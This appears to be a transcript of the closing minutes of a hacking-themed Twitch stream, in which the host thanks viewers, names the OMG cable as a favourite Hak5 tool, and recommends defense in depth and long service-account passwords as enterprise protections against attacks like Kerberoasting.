Oh. Oh, it's gonna be close. Maticus, if we fail, I blame it directly on you. Oh, those blue guys are clapping our cheeks. Oh my god, get in there, boys. Fuck them up. Oh, our archers ran off. They got a little too big for their britches there. A little too big for their britches, those archers. But we got it in the end. Good work, team. All right. Anybody have any questions about what we covered today? Great stream we had today. Great interview with Nahamsec. Thank you again for the raid. Thank you for everyone who checked me out, everyone who joined us for these Funday Sunday shenanigans. The next time I stream is on Tuesday. Tuesday is Newbie Tuesday. Newbie Tuesday. Newbie Tuesday, as the name suggests, is the day that we do boxes that are a little bit easier, and we break it down as much as possible for those who are just starting out on their hacking journey. So I highly recommend, if you're new to this stuff, to check me out on Newbie Tuesday. I have a more high-level question about red teaming big enterprises. Sure. By all means, ask. I'm not going to run off just yet. Ask away. Gonna look for someone to raid. Not sure who I'm going to raid yet. Ooh, Hacking Esports is streaming. I guess we're obviously doing Hacking Esports, right? Is Infosec casting? I don't see Infosec. Infosec is not casting, but that's okay. We'll raid Hacking Esports anyway when it comes time. I'll be back, and it was great content. I'm glad you enjoyed it, my dude. I do my best to bring you entertaining as well as informative content. What's your favorite Hack 5 tool? Honestly, I don't use many of them. But my favorite one has to be that fake iPhone cable. There's an iPhone cable that's actually just a USB device. It's basically a wireless dongle. And that thing is the OMG cable. Yeah, there you go. It's pretty cool. What can a big enterprise do in the design of their organization to really screw up your ability to move through the network? Like compartmentalized processes is what I'm thinking. Well, there's a lot of things. We advocate, there's not any one specific thing. We advocate for a policy called defense in depth. Defense in depth means multi-layers of disruption to frustrate and catch attackers early on in their attacks. Oh no, Infosec is casting. That is Infosec. He's just not on cam. He's there, he's just not on cam. So the idea is you'd have multiple layers of defense. Like you don't just have endpoint protection installed. You have endpoint protection, and you have email filters, and you have Blue Coat proxy doing SSL stripping to detect to detect beacons, Cobalt Strike beacons. You have Splunk listening on the network for any malicious activity. You have network segmentation, like you have a DMZ that's where the external perimeter of the corporation is separated from the internal network. You got a lot of stuff. There's a lot of tiers of defense. And plus, you have a configured Active Directory with the principle of least privilege being observed. Service accounts have long passwords. One of the most common ways that I pivot around is through Kerber roasting. Kerber roasting and pivoting around with service accounts that I've cracked the passwords of. If you have long, complex service account passwords, that really frustrates my ability. That does a lot all by itself. Yeah, that about sums it up. There's a lot of things that you can do. A lot of things. I'm glad you liked it, Sparwall. It's good to have you. Owen Codes with the 10 bits. Thank you so much. Leo V1280. Gar, thank you again for all your gifted subs today if you're still in chat. Thank you so much. That was so kind of you. What tool are you using for displaying your Necronomicon? This is Obsidian. That is the note-taking tool Obsidian. Malding Master with a $15 sacrifice. Thank you so much, Malding Master. That is so kind of you. I hope you. I haven't seen you before, so I hope you enjoyed the. I hope you enjoyed the stream today, and I hope you'll check me out again. Thank you so much. It is Obsidian. If you want my notes, I have a Patreon account where I post those notes. I keep them updated fairly frequently. It's just a cheat sheet full of common things that common commands that I end up having to run. Most of it is a cheat sheet. Some of it is other stuff. It's a lot of stuff. All right. Any last questions before we raid Hacking Esports chat? Patreon is not the Obsidian sync. No. Patreon it's a patreon.com/alhazred. And if you download the Necronomicon off of there, the Necronomicon being my notes, all it is markdown files. It's just markdown. If you would like them to look as they look as you saw tonight, you'll just need to download the open source Obsidian note-taking tool. It's free. And then just open that as a password vault. Or just open that as a note vault. That's it. I'm glad you enjoyed it, Cyber Samurai. All right, we're going to raid Hacking Esports. I always leap if you would like to ask me questions off stream, I always welcome Discord messages. What are you going to do? I'm new here. I'm a hacker, my dude. We're just finishing up the stream, unfortunately. But normally we do hacking content. I show people how to hack. If you're curious about the dark magics of modern day sorcery, I'd encourage you to check me out on Tuesday when I'll be streaming next. Wolf King, thank you for the follow. Say hi to Infosec for me. Say hi to Hacking Esports for me. Nahamsec, thank you once again for the wonderful interview today. I had a great time. Thank you all who came from Nahamsec's stream. I hope you enjoyed the content. I hope you'll check me out again. We'll be back again on Tuesday. Feel free to reach out to me offline on Discord via email. I'm easy to find. It's easy to find my contact information. If you have questions or want mentorship or just want to say hi or give feedback on the stream, I always welcome fans reaching out to me by any medium they would like. Yeah, that's it. Go to bed tonight knowing a little bit more than you did yesterday. I'll see you guys again when the stars are right. Have a good night, day, or whatever time it is wherever you are. Get vaccinated. Stay safe. Love you all.